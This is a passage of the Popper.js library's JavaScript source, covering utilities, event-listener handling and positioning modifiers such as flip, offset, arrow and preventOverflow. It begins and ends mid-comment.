Popper.Utils * @returns {Boolean} */ function isModifierEnabled(modifiers, modifierName) { return modifiers.some(function (_ref) { var name = _ref.name, enabled = _ref.enabled; return enabled && name === modifierName; }); } /** * Get the prefixed supported property name * @method * @memberof Popper.Utils * @argument {String} property (camelCase) * @returns {String} prefixed property (camelCase or PascalCase, depending on the vendor prefix) */ function getSupportedPropertyName(property) { var prefixes = [false, 'ms', 'Webkit', 'Moz', 'O']; var upperProp = property.charAt(0).toUpperCase() + property.slice(1); for (var i = 0; i < prefixes.length; i++) { var prefix = prefixes[i]; var toCheck = prefix ? '' + prefix + upperProp : property; if (typeof document.body.style[toCheck] !== 'undefined') { return toCheck; } } return null; } /** * Destroys the popper. * @method * @memberof Popper */ function destroy() { this.state.isDestroyed = true; // touch DOM only if `applyStyle` modifier is enabled if (isModifierEnabled(this.modifiers, 'applyStyle')) { this.popper.removeAttribute('x-placement'); this.popper.style.position = ''; this.popper.style.top = ''; this.popper.style.left = ''; this.popper.style.right = ''; this.popper.style.bottom = ''; this.popper.style.willChange = ''; this.popper.style[getSupportedPropertyName('transform')] = ''; } this.disableEventListeners(); // remove the popper if user explicitly asked for the deletion on destroy // do not use `remove` because IE11 doesn't support it if (this.options.removeOnDestroy) { this.popper.parentNode.removeChild(this.popper); } return this; } /** * Get the window associated with the element * @argument {Element} element * @returns {Window} */ function getWindow(element) { var ownerDocument = element.ownerDocument; return ownerDocument ? ownerDocument.defaultView : window; } function attachToScrollParents(scrollParent, event, callback, scrollParents) { var isBody = scrollParent.nodeName === 'BODY'; var target = isBody ? scrollParent.ownerDocument.defaultView : scrollParent; target.addEventListener(event, callback, { passive: true }); if (!isBody) { attachToScrollParents(getScrollParent(target.parentNode), event, callback, scrollParents); } scrollParents.push(target); } /** * Setup needed event listeners used to update the popper position * @method * @memberof Popper.Utils * @private */ function setupEventListeners(reference, options, state, updateBound) { // Resize event listener on window state.updateBound = updateBound; getWindow(reference).addEventListener('resize', state.updateBound, { passive: true }); // Scroll event listener on scroll parents var scrollElement = getScrollParent(reference); attachToScrollParents(scrollElement, 'scroll', state.updateBound, state.scrollParents); state.scrollElement = scrollElement; state.eventsEnabled = true; return state; } /** * It will add resize/scroll events and start recalculating * position of the popper element when they are triggered. * @method * @memberof Popper */ function enableEventListeners() { if (!this.state.eventsEnabled) { this.state = setupEventListeners(this.reference, this.options, this.state, this.scheduleUpdate); } } /** * Remove event listeners used to update the popper position * @method * @memberof Popper.Utils * @private */ function removeEventListeners(reference, state) { // Remove resize event listener on window getWindow(reference).removeEventListener('resize', state.updateBound); // Remove scroll event listener on scroll parents state.scrollParents.forEach(function (target) { target.removeEventListener('scroll', state.updateBound); }); // Reset state state.updateBound = null; state.scrollParents = []; state.scrollElement = null; state.eventsEnabled = false; return state; } /** * It will remove resize/scroll events and won't recalculate popper position * when they are triggered. It also won't trigger `onUpdate` callback anymore, * unless you call `update` method manually. * @method * @memberof Popper */ function disableEventListeners() { if (this.state.eventsEnabled) { cancelAnimationFrame(this.scheduleUpdate); this.state = removeEventListeners(this.reference, this.state); } } /** * Tells if a given input is a number * @method * @memberof Popper.Utils * @param {*} input to check * @return {Boolean} */ function isNumeric(n) { return n !== '' && !isNaN(parseFloat(n)) && isFinite(n); } /** * Set the style to the given popper * @method * @memberof Popper.Utils * @argument {Element} element - Element to apply the style to * @argument {Object} styles * Object with a list of properties and values which will be applied to the element */ function setStyles(element, styles) { Object.keys(styles).forEach(function (prop) { var unit = ''; // add unit if the value is numeric and is one of the following if (['width', 'height', 'top', 'right', 'bottom', 'left'].indexOf(prop) !== -1 && isNumeric(styles[prop])) { unit = 'px'; } element.style[prop] = styles[prop] + unit; }); } /** * Set the attributes to the given popper * @method * @memberof Popper.Utils * @argument {Element} element - Element to apply the attributes to * @argument {Object} styles * Object with a list of properties and values which will be applied to the element */ function setAttributes(element, attributes) { Object.keys(attributes).forEach(function (prop) { var value = attributes[prop]; if (value !== false) { element.setAttribute(prop, attributes[prop]); } else { element.removeAttribute(prop); } }); } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by `update` method * @argument {Object} data.styles - List of style properties - values to apply to popper element * @argument {Object} data.attributes - List of attribute properties - values to apply to popper element * @argument {Object} options - Modifiers configuration and options * @returns {Object} The same data object */ function applyStyle(data) { // any property present in `data.styles` will be applied to the popper, // in this way we can make the 3rd party modifiers add custom styles to it // Be aware, modifiers could override the properties defined in the previous // lines of this modifier! setStyles(data.instance.popper, data.styles); // any property present in `data.attributes` will be applied to the popper, // they will be set as HTML attributes of the element setAttributes(data.instance.popper, data.attributes); // if arrowElement is defined and arrowStyles has some properties if (data.arrowElement && Object.keys(data.arrowStyles).length) { setStyles(data.arrowElement, data.arrowStyles); } return data; } /** * Set the x-placement attribute before everything else because it could be used * to add margins to the popper margins needs to be calculated to get the * correct popper offsets. * @method * @memberof Popper.modifiers * @param {HTMLElement} reference - The reference element used to position the popper * @param {HTMLElement} popper - The HTML element used as popper * @param {Object} options - Popper.js options */ function applyStyleOnLoad(reference, popper, options, modifierOptions, state) { // compute reference element offsets var referenceOffsets = getReferenceOffsets(state, popper, reference, options.positionFixed); // compute auto placement, store placement inside the data object, // modifiers will be able to edit `placement` if needed // and refer to originalPlacement to know the original value var placement = computeAutoPlacement(options.placement, referenceOffsets, popper, reference, options.modifiers.flip.boundariesElement, options.modifiers.flip.padding); popper.setAttribute('x-placement', placement); // Apply `position` to popper before anything else because // without the position applied we can't guarantee correct computations setStyles(popper, { position: options.positionFixed ? 'fixed' : 'absolute' }); return options; } /** * @function * @memberof Popper.Utils * @argument {Object} data - The data object generated by `update` method * @argument {Boolean} shouldRound - If the offsets should be rounded at all * @returns {Object} The popper's position offsets rounded * * The tale of pixel-perfect positioning. It's still not 100% perfect, but as * good as it can be within reason. * Discussion here: https://github.com/FezVrasta/popper.js/pull/715 * * Low DPI screens cause a popper to be blurry if not using full pixels (Safari * as well on High DPI screens). * * Firefox prefers no rounding for positioning and does not have blurriness on * high DPI screens. * * Only horizontal placement and left/right values need to be considered. */ function getRoundedOffsets(data, shouldRound) { var _data$offsets = data.offsets, popper = _data$offsets.popper, reference = _data$offsets.reference; var round = Math.round, floor = Math.floor; var noRound = function noRound(v) { return v; }; var referenceWidth = round(reference.width); var popperWidth = round(popper.width); var isVertical = ['left', 'right'].indexOf(data.placement) !== -1; var isVariation = data.placement.indexOf('-') !== -1; var sameWidthParity = referenceWidth % 2 === popperWidth % 2; var bothOddWidth = referenceWidth % 2 === 1 && popperWidth % 2 === 1; var horizontalToInteger = !shouldRound ? noRound : isVertical || isVariation || sameWidthParity ? round : floor; var verticalToInteger = !shouldRound ? noRound : round; return { left: horizontalToInteger(bothOddWidth && !isVariation && shouldRound ? popper.left - 1 : popper.left), top: verticalToInteger(popper.top), bottom: verticalToInteger(popper.bottom), right: horizontalToInteger(popper.right) }; } var isFirefox = isBrowser && /Firefox/i.test(navigator.userAgent); /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by `update` method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function computeStyle(data, options) { var x = options.x, y = options.y; var popper = data.offsets.popper; // Remove this legacy support in Popper.js v2 var legacyGpuAccelerationOption = find(data.instance.modifiers, function (modifier) { return modifier.name === 'applyStyle'; }).gpuAcceleration; if (legacyGpuAccelerationOption !== undefined) { console.warn('WARNING: `gpuAcceleration` option moved to `computeStyle` modifier and will not be supported in future versions of Popper.js!'); } var gpuAcceleration = legacyGpuAccelerationOption !== undefined ? legacyGpuAccelerationOption : options.gpuAcceleration; var offsetParent = getOffsetParent(data.instance.popper); var offsetParentRect = getBoundingClientRect(offsetParent); // Styles var styles = { position: popper.position }; var offsets = getRoundedOffsets(data, window.devicePixelRatio < 2 || !isFirefox); var sideA = x === 'bottom' ? 'top' : 'bottom'; var sideB = y === 'right' ? 'left' : 'right'; // if gpuAcceleration is set to `true` and transform is supported, // we use `translate3d` to apply the position to the popper we // automatically use the supported prefixed version if needed var prefixedProperty = getSupportedPropertyName('transform'); // now, let's make a step back and look at this code closely (wtf?) // If the content of the popper grows once it's been positioned, it // may happen that the popper gets misplaced because of the new content // overflowing its reference element // To avoid this problem, we provide two options (x and y), which allow // the consumer to define the offset origin. // If we position a popper on top of a reference element, we can set // `x` to `top` to make the popper grow towards its top instead of // its bottom. var left = void 0, top = void 0; if (sideA === 'bottom') { // when offsetParent is the positioning is relative to the bottom of the screen (excluding the scrollbar) // and not the bottom of the html element if (offsetParent.nodeName === 'HTML') { top = -offsetParent.clientHeight + offsets.bottom; } else { top = -offsetParentRect.height + offsets.bottom; } } else { top = offsets.top; } if (sideB === 'right') { if (offsetParent.nodeName === 'HTML') { left = -offsetParent.clientWidth + offsets.right; } else { left = -offsetParentRect.width + offsets.right; } } else { left = offsets.left; } if (gpuAcceleration && prefixedProperty) { styles[prefixedProperty] = 'translate3d(' + left + 'px, ' + top + 'px, 0)'; styles[sideA] = 0; styles[sideB] = 0; styles.willChange = 'transform'; } else { // othwerise, we use the standard `top`, `left`, `bottom` and `right` properties var invertTop = sideA === 'bottom' ? -1 : 1; var invertLeft = sideB === 'right' ? -1 : 1; styles[sideA] = top * invertTop; styles[sideB] = left * invertLeft; styles.willChange = sideA + ', ' + sideB; } // Attributes var attributes = { 'x-placement': data.placement }; // Update `data` attributes, styles and arrowStyles data.attributes = _extends({}, attributes, data.attributes); data.styles = _extends({}, styles, data.styles); data.arrowStyles = _extends({}, data.offsets.arrow, data.arrowStyles); return data; } /** * Helper used to know if the given modifier depends from another one.
* It checks if the needed modifier is listed and enabled. * @method * @memberof Popper.Utils * @param {Array} modifiers - list of modifiers * @param {String} requestingName - name of requesting modifier * @param {String} requestedName - name of requested modifier * @returns {Boolean} */ function isModifierRequired(modifiers, requestingName, requestedName) { var requesting = find(modifiers, function (_ref) { var name = _ref.name; return name === requestingName; }); var isRequired = !!requesting && modifiers.some(function (modifier) { return modifier.name === requestedName && modifier.enabled && modifier.order < requesting.order; }); if (!isRequired) { var _requesting = '`' + requestingName + '`'; var requested = '`' + requestedName + '`'; console.warn(requested + ' modifier is required by ' + _requesting + ' modifier in order to work, be sure to include it before ' + _requesting + '!'); } return isRequired; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function arrow(data, options) { var _data$offsets$arrow; // arrow depends on keepTogether in order to work if (!isModifierRequired(data.instance.modifiers, 'arrow', 'keepTogether')) { return data; } var arrowElement = options.element; // if arrowElement is a string, suppose it's a CSS selector if (typeof arrowElement === 'string') { arrowElement = data.instance.popper.querySelector(arrowElement); // if arrowElement is not found, don't run the modifier if (!arrowElement) { return data; } } else { // if the arrowElement isn't a query selector we must check that the // provided DOM node is child of its popper node if (!data.instance.popper.contains(arrowElement)) { console.warn('WARNING: `arrow.element` must be child of its popper element!'); return data; } } var placement = data.placement.split('-')[0]; var _data$offsets = data.offsets, popper = _data$offsets.popper, reference = _data$offsets.reference; var isVertical = ['left', 'right'].indexOf(placement) !== -1; var len = isVertical ? 'height' : 'width'; var sideCapitalized = isVertical ? 'Top' : 'Left'; var side = sideCapitalized.toLowerCase(); var altSide = isVertical ? 'left' : 'top'; var opSide = isVertical ? 'bottom' : 'right'; var arrowElementSize = getOuterSizes(arrowElement)[len]; // // extends keepTogether behavior making sure the popper and its // reference have enough pixels in conjunction // // top/left side if (reference[opSide] - arrowElementSize < popper[side]) { data.offsets.popper[side] -= popper[side] - (reference[opSide] - arrowElementSize); } // bottom/right side if (reference[side] + arrowElementSize > popper[opSide]) { data.offsets.popper[side] += reference[side] + arrowElementSize - popper[opSide]; } data.offsets.popper = getClientRect(data.offsets.popper); // compute center of the popper var center = reference[side] + reference[len] / 2 - arrowElementSize / 2; // Compute the sideValue using the updated popper offsets // take popper margin in account because we don't have this info available var css = getStyleComputedProperty(data.instance.popper); var popperMarginSide = parseFloat(css['margin' + sideCapitalized], 10); var popperBorderSide = parseFloat(css['border' + sideCapitalized + 'Width'], 10); var sideValue = center - data.offsets.popper[side] - popperMarginSide - popperBorderSide; // prevent arrowElement from being placed not contiguously to its popper sideValue = Math.max(Math.min(popper[len] - arrowElementSize, sideValue), 0); data.arrowElement = arrowElement; data.offsets.arrow = (_data$offsets$arrow = {}, defineProperty(_data$offsets$arrow, side, Math.round(sideValue)), defineProperty(_data$offsets$arrow, altSide, ''), _data$offsets$arrow); return data; } /** * Get the opposite placement variation of the given one * @method * @memberof Popper.Utils * @argument {String} placement variation * @returns {String} flipped placement variation */ function getOppositeVariation(variation) { if (variation === 'end') { return 'start'; } else if (variation === 'start') { return 'end'; } return variation; } /** * List of accepted placements to use as values of the `placement` option.
* Valid placements are: * - `auto` * - `top` * - `right` * - `bottom` * - `left` * * Each placement can have a variation from this list: * - `-start` * - `-end` * * Variations are interpreted easily if you think of them as the left to right * written languages. Horizontally (`top` and `bottom`), `start` is left and `end` * is right.
* Vertically (`left` and `right`), `start` is top and `end` is bottom. * * Some valid examples are: * - `top-end` (on top of reference, right aligned) * - `right-start` (on right of reference, top aligned) * - `bottom` (on bottom, centered) * - `auto-end` (on the side with more space available, alignment depends by placement) * * @static * @type {Array} * @enum {String} * @readonly * @method placements * @memberof Popper */ var placements = ['auto-start', 'auto', 'auto-end', 'top-start', 'top', 'top-end', 'right-start', 'right', 'right-end', 'bottom-end', 'bottom', 'bottom-start', 'left-end', 'left', 'left-start']; // Get rid of `auto` `auto-start` and `auto-end` var validPlacements = placements.slice(3); /** * Given an initial placement, returns all the subsequent placements * clockwise (or counter-clockwise). * * @method * @memberof Popper.Utils * @argument {String} placement - A valid placement (it accepts variations) * @argument {Boolean} counter - Set to true to walk the placements counterclockwise * @returns {Array} placements including their variations */ function clockwise(placement) { var counter = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false; var index = validPlacements.indexOf(placement); var arr = validPlacements.slice(index + 1).concat(validPlacements.slice(0, index)); return counter ? arr.reverse() : arr; } var BEHAVIORS = { FLIP: 'flip', CLOCKWISE: 'clockwise', COUNTERCLOCKWISE: 'counterclockwise' }; /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function flip(data, options) { // if `inner` modifier is enabled, we can't use the `flip` modifier if (isModifierEnabled(data.instance.modifiers, 'inner')) { return data; } if (data.flipped && data.placement === data.originalPlacement) { // seems like flip is trying to loop, probably there's not enough space on any of the flippable sides return data; } var boundaries = getBoundaries(data.instance.popper, data.instance.reference, options.padding, options.boundariesElement, data.positionFixed); var placement = data.placement.split('-')[0]; var placementOpposite = getOppositePlacement(placement); var variation = data.placement.split('-')[1] || ''; var flipOrder = []; switch (options.behavior) { case BEHAVIORS.FLIP: flipOrder = [placement, placementOpposite]; break; case BEHAVIORS.CLOCKWISE: flipOrder = clockwise(placement); break; case BEHAVIORS.COUNTERCLOCKWISE: flipOrder = clockwise(placement, true); break; default: flipOrder = options.behavior; } flipOrder.forEach(function (step, index) { if (placement !== step || flipOrder.length === index + 1) { return data; } placement = data.placement.split('-')[0]; placementOpposite = getOppositePlacement(placement); var popperOffsets = data.offsets.popper; var refOffsets = data.offsets.reference; // using floor because the reference offsets may contain decimals we are not going to consider here var floor = Math.floor; var overlapsRef = placement === 'left' && floor(popperOffsets.right) > floor(refOffsets.left) || placement === 'right' && floor(popperOffsets.left) < floor(refOffsets.right) || placement === 'top' && floor(popperOffsets.bottom) > floor(refOffsets.top) || placement === 'bottom' && floor(popperOffsets.top) < floor(refOffsets.bottom); var overflowsLeft = floor(popperOffsets.left) < floor(boundaries.left); var overflowsRight = floor(popperOffsets.right) > floor(boundaries.right); var overflowsTop = floor(popperOffsets.top) < floor(boundaries.top); var overflowsBottom = floor(popperOffsets.bottom) > floor(boundaries.bottom); var overflowsBoundaries = placement === 'left' && overflowsLeft || placement === 'right' && overflowsRight || placement === 'top' && overflowsTop || placement === 'bottom' && overflowsBottom; // flip the variation if required var isVertical = ['top', 'bottom'].indexOf(placement) !== -1; // flips variation if reference element overflows boundaries var flippedVariationByRef = !!options.flipVariations && (isVertical && variation === 'start' && overflowsLeft || isVertical && variation === 'end' && overflowsRight || !isVertical && variation === 'start' && overflowsTop || !isVertical && variation === 'end' && overflowsBottom); // flips variation if popper content overflows boundaries var flippedVariationByContent = !!options.flipVariationsByContent && (isVertical && variation === 'start' && overflowsRight || isVertical && variation === 'end' && overflowsLeft || !isVertical && variation === 'start' && overflowsBottom || !isVertical && variation === 'end' && overflowsTop); var flippedVariation = flippedVariationByRef || flippedVariationByContent; if (overlapsRef || overflowsBoundaries || flippedVariation) { // this boolean to detect any flip loop data.flipped = true; if (overlapsRef || overflowsBoundaries) { placement = flipOrder[index + 1]; } if (flippedVariation) { variation = getOppositeVariation(variation); } data.placement = placement + (variation ? '-' + variation : ''); // this object contains `position`, we want to preserve it along with // any additional property we may add in the future data.offsets.popper = _extends({}, data.offsets.popper, getPopperOffsets(data.instance.popper, data.offsets.reference, data.placement)); data = runModifiers(data.instance.modifiers, data, 'flip'); } }); return data; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function keepTogether(data) { var _data$offsets = data.offsets, popper = _data$offsets.popper, reference = _data$offsets.reference; var placement = data.placement.split('-')[0]; var floor = Math.floor; var isVertical = ['top', 'bottom'].indexOf(placement) !== -1; var side = isVertical ? 'right' : 'bottom'; var opSide = isVertical ? 'left' : 'top'; var measurement = isVertical ? 'width' : 'height'; if (popper[side] < floor(reference[opSide])) { data.offsets.popper[opSide] = floor(reference[opSide]) - popper[measurement]; } if (popper[opSide] > floor(reference[side])) { data.offsets.popper[opSide] = floor(reference[side]); } return data; } /** * Converts a string containing value + unit into a px value number * @function * @memberof {modifiers~offset} * @private * @argument {String} str - Value + unit string * @argument {String} measurement - `height` or `width` * @argument {Object} popperOffsets * @argument {Object} referenceOffsets * @returns {Number|String} * Value in pixels, or original string if no values were extracted */ function toValue(str, measurement, popperOffsets, referenceOffsets) { // separate value from unit var split = str.match(/((?:\-|\+)?\d*\.?\d*)(.*)/); var value = +split[1]; var unit = split[2]; // If it's not a number it's an operator, I guess if (!value) { return str; } if (unit.indexOf('%') === 0) { var element = void 0; switch (unit) { case '%p': element = popperOffsets; break; case '%': case '%r': default: element = referenceOffsets; } var rect = getClientRect(element); return rect[measurement] / 100 * value; } else if (unit === 'vh' || unit === 'vw') { // if is a vh or vw, we calculate the size based on the viewport var size = void 0; if (unit === 'vh') { size = Math.max(document.documentElement.clientHeight, window.innerHeight || 0); } else { size = Math.max(document.documentElement.clientWidth, window.innerWidth || 0); } return size / 100 * value; } else { // if is an explicit pixel unit, we get rid of the unit and keep the value // if is an implicit unit, it's px, and we return just the value return value; } } /** * Parse an `offset` string to extrapolate `x` and `y` numeric offsets. * @function * @memberof {modifiers~offset} * @private * @argument {String} offset * @argument {Object} popperOffsets * @argument {Object} referenceOffsets * @argument {String} basePlacement * @returns {Array} a two cells array with x and y offsets in numbers */ function parseOffset(offset, popperOffsets, referenceOffsets, basePlacement) { var offsets = [0, 0]; // Use height if placement is left or right and index is 0 otherwise use width // in this way the first offset will use an axis and the second one // will use the other one var useHeight = ['right', 'left'].indexOf(basePlacement) !== -1; // Split the offset string to obtain a list of values and operands // The regex addresses values with the plus or minus sign in front (+10, -20, etc) var fragments = offset.split(/(\+|\-)/).map(function (frag) { return frag.trim(); }); // Detect if the offset string contains a pair of values or a single one // they could be separated by comma or space var divider = fragments.indexOf(find(fragments, function (frag) { return frag.search(/,|\s/) !== -1; })); if (fragments[divider] && fragments[divider].indexOf(',') === -1) { console.warn('Offsets separated by white space(s) are deprecated, use a comma (,) instead.'); } // If divider is found, we divide the list of values and operands to divide // them by ofset X and Y. var splitRegex = /\s*,\s*|\s+/; var ops = divider !== -1 ? [fragments.slice(0, divider).concat([fragments[divider].split(splitRegex)[0]]), [fragments[divider].split(splitRegex)[1]].concat(fragments.slice(divider + 1))] : [fragments]; // Convert the values with units to absolute pixels to allow our computations ops = ops.map(function (op, index) { // Most of the units rely on the orientation of the popper var measurement = (index === 1 ? !useHeight : useHeight) ? 'height' : 'width'; var mergeWithPrevious = false; return op // This aggregates any `+` or `-` sign that aren't considered operators // e.g.: 10 + +5 => [10, +, +5] .reduce(function (a, b) { if (a[a.length - 1] === '' && ['+', '-'].indexOf(b) !== -1) { a[a.length - 1] = b; mergeWithPrevious = true; return a; } else if (mergeWithPrevious) { a[a.length - 1] += b; mergeWithPrevious = false; return a; } else { return a.concat(b); } }, []) // Here we convert the string values into number values (in px) .map(function (str) { return toValue(str, measurement, popperOffsets, referenceOffsets); }); }); // Loop trough the offsets arrays and execute the operations ops.forEach(function (op, index) { op.forEach(function (frag, index2) { if (isNumeric(frag)) { offsets[index] += frag * (op[index2 - 1] === '-' ? -1 : 1); } }); }); return offsets; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @argument {Number|String} options.offset=0 * The offset value as described in the modifier description * @returns {Object} The data object, properly modified */ function offset(data, _ref) { var offset = _ref.offset; var placement = data.placement, _data$offsets = data.offsets, popper = _data$offsets.popper, reference = _data$offsets.reference; var basePlacement = placement.split('-')[0]; var offsets = void 0; if (isNumeric(+offset)) { offsets = [+offset, 0]; } else { offsets = parseOffset(offset, popper, reference, basePlacement); } if (basePlacement === 'left') { popper.top += offsets[0]; popper.left -= offsets[1]; } else if (basePlacement === 'right') { popper.top += offsets[0]; popper.left += offsets[1]; } else if (basePlacement === 'top') { popper.left += offsets[0]; popper.top -= offsets[1]; } else if (basePlacement === 'bottom') { popper.left += offsets[0]; popper.top += offsets[1]; } data.popper = popper; return data; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by `update` method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function preventOverflow(data, options) { var boundariesElement = options.boundariesElement || getOffsetParent(data.instance.popper); // If offsetParent is the reference element, we really want to // go one step up and use the next offsetParent as reference to // avoid to make this modifier completely useless and look like broken if (data.instance.reference === boundariesElement) { boundariesElement = getOffsetParent(boundariesElement); } // NOTE: DOM access here // resets the popper's position so that the document size can be calculated excluding // the size of the popper element itself var transformProp = getSupportedPropertyName('transform'); var popperStyles = data.instance.popper.style; // assignment to help minification var top = popperStyles.top, left = popperStyles.left, transform = popperStyles[transformProp]; popperStyles.top = ''; popperStyles.left = ''; popperStyles[transformProp] = ''; var boundaries = getBoundaries(data.instance.popper, data.instance.reference, options.padding, boundariesElement, data.positionFixed); // NOTE: DOM access here // restores the original style properties after the offsets have been computed popperStyles.top = top; popperStyles.left = left; popperStyles[transformProp] = transform; options.boundaries = boundaries; var order = options.priority; var popper = data.offsets.popper; var check = { primary: function primary(placement) { var value = popper[placement]; if (popper[placement] < boundaries[placement] && !options.escapeWithReference) { value = Math.max(popper[placement], boundaries[placement]); } return defineProperty({}, placement, value); }, secondary: function secondary(placement) { var mainSide = placement === 'right' ? 'left' : 'top'; var value = popper[mainSide]; if (popper[placement] > boundaries[placement] && !options.escapeWithReference) { value = Math.min(popper[mainSide], boundaries[placement] - (placement === 'right' ? popper.width : popper.height)); } return defineProperty({}, mainSide, value); } }; order.forEach(function (placement) { var side = ['left', 'top'].indexOf(placement) !== -1 ? 'primary' : 'secondary'; popper = _extends({}, popper, check[side](placement)); }); data.offsets.popper = popper; return data; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by `update` method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function shift(data) { var placement = data.placement; var basePlacement = placement.split('-')[0]; var shiftvariation = placement.split('-')[1]; // if shift shiftvariation is specified, run the modifier if (shiftvariation) { var _data$offsets = data.offsets, reference = _data$offsets.reference, popper = _data$offsets.popper; var isVertical = ['bottom', 'top'].indexOf(basePlacement) !== -1; var side = isVertical ? 'left' : 'top'; var measurement = isVertical ? 'width' : 'height'; var shiftOffsets = { start: defineProperty({}, side, reference[side]), end: defineProperty({}, side, reference[side] + reference[measurement] - popper[measurement]) }; data.offsets.popper = _extends({}, popper, shiftOffsets[shiftvariation]); } return data; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function hide(data) { if (!isModifierRequired(data.instance.modifiers, 'hide', 'preventOverflow')) { return data; } var refRect = data.offsets.reference; var bound = find(data.instance.modifiers, function (modifier) { return modifier.name === 'preventOverflow'; }).boundaries; if (refRect.bottom < bound.top || refRect.left > bound.right || refRect.top > bound.bottom || refRect.right < bound.left) { // Avoid unnecessary DOM access if visibility hasn't changed if (data.hide === true) { return data; } data.hide = true; data.attributes['x-out-of-boundaries'] = ''; } else { // Avoid unnecessary DOM access if visibility hasn't changed if (data.hide === false) { return data; } data.hide = false; data.attributes['x-out-of-boundaries'] = false; } return data; } /** * @function * @memberof Modifiers * @argument {Object} data - The data object generated by `update` method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function inner(data) { var placement = data.placement; var basePlacement = placement.split('-')[0]; var _data$offsets = data.offsets, popper = _data$offsets.popper, reference = _data$offsets.reference; var isHoriz = ['left', 'right'].indexOf(basePlacement) !== -1; var subtractLength = ['top', 'left'].indexOf(basePlacement) === -1; popper[isHoriz ? 'left' : 'top'] = reference[basePlacement] - (subtractLength ? popper[isHoriz ? 'width' : 'height'] : 0); data.placement = getOppositePlacement(placement); data.offsets.popper = getClientRect(popper); return data; } /** * Modifier function, each modifier can have a function of this type assigned * to its `fn` property.
* These functions will be called on each update, this means that you must * make sure they are performant enough to avoid performance bottlenecks. * * @function ModifierFn * @argument {dataObject} data - The data object generated by `update` method * @argument {Object} options - Modifiers configuration and options * @returns {dataObject} The data object, properly modified */ /** * Modifiers are plugins used to alter the behavior of your poppers.
* Popper.js uses a set of 9 modifiers to provide all the basic functionalities * needed by the library. * * Usually you don't want to override the `order`, `fn` and `onLoad` props. * All the other properties are configurations that could be tweaked. * @namespace modifiers */ var modifiers = { /** * Modifier used to shift the popper on the start or end of its reference * element.
* It will read the variation of the `placement` property.
* It can be one either `-end` or `-start`. * @memberof modifiers * @inner */ shift: { /** @prop {number} order=100 - Index used to define the order of execution */ order: 100, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: shift }, /** * The `offset` modifier can shift your popper on both its axis. * * It accepts the following units: * - `px` or unit-less, interpreted as pixels * - `%` or `%r`, percentage relative to the length of the reference element * - `%p`, percentage relative to the length of the popper element * - `vw`, CSS viewport width unit * - `vh`, CSS viewport height unit * * For length is intended the main axis relative to the placement of the popper.
* This means that if the placement is `top` or `bottom`, the length will be the * `width`. In case of `left` or `right`, it will be the `height`. * * You can provide a single value (as `Number` or `String`), or a pair of values * as `String` divided by a comma or one (or more) white spaces.
* The latter is a deprecated method because it leads to confusion and will be * removed in v2.
* Additionally, it accepts additions and subtractions between different units. * Note that multiplications and divisions aren't supported. * * Valid examples are: * ``` * 10 * '10%' * '10, 10' * '10%, 10' * '10 + 10%' * '10 - 5vh + 3%' * '-10px + 5vh, 5px - 6%' * ``` * > **NB**: If you desire to apply offsets to your poppers in a way that may make them overlap * > with their reference element, unfortunately, you will have to disable the `flip` modifier. * > You can read more on this at this [issue](https://github.com/FezVrasta/popper.js/issues/373). * * @memberof modifiers * @inner */ offset: { /** @prop {number} order=200 - Index used to define the order of execution */ order: 200, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: offset, /** @prop {Number|String} offset=0 * The offset value as described in the modifier description */ offset: 0 }, /** * Modifier used to prevent the popper from being positioned outside the boundary. * * A scenario exists where the reference itself is not within the boundaries.
* We can say it has "escaped the boundaries" — or just "escaped".
* In this case we need to decide whether the popper should either: * * - detach from the reference and remain "trapped" in the boundaries, or * - if it should ignore the boundary and "escape with its reference" * * When `escapeWithReference` is set to`true` and reference is completely * outside its boundaries, the popper will overflow (or completely leave) * the boundaries in order to remain attached to the edge of the reference. * * @memberof modifiers * @inner */ preventOverflow: { /** @prop {number} order=300 - Index used to define the order of execution */ order: 300, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: preventOverflow, /** * @prop {Array} [priority=['left','right','top','bottom']] * Popper will try to prevent overflow following these priorities by default, * then, it could overflow on the left and on top of the `boundariesElement` */ priority: ['left', 'right', 'top', 'bottom'], /** * @prop {number} padding=5 * Amount of pixel used to define a minimum distance between the boundaries * and the popper. This makes sure the popper always has a little padding * between the edges of its container */ padding: 5, /** * @prop {String|HTMLElement} boundariesElement='scrollParent' * Boundaries used by the modifier. Can be `scrollParent`, `window`, * `viewport` or any DOM element. */ boundariesElement: 'scrollParent' }, /** * Modifier used to make sure the reference and its popper stay near each other * without leaving any gap between the two. Especially useful when the arrow is * enabled and you want to ensure that it points to its reference element. * It cares only about the first axis. You can still have poppers with margin * between the popper and its reference element. * @memberof modifiers * @inner */ keepTogether: { /** @prop {number} order=400 - Index used to define the order of execution */ order: 400, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: keepTogether }, /** * This modifier is used to move the `arrowElement` of the popper to make * sure it is positioned between the reference element and its popper element. * It will read the outer size of the `arrowElement` node to detect how many * pixels of conjunction are needed. * * It has no effect if no `arrowElement` is provided. * @memberof modifiers * @inner */ arrow: { /** @prop {number} order=500 - Index used to define the order of execution */ order: 500, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: arrow, /** @prop {String|HTMLElement} 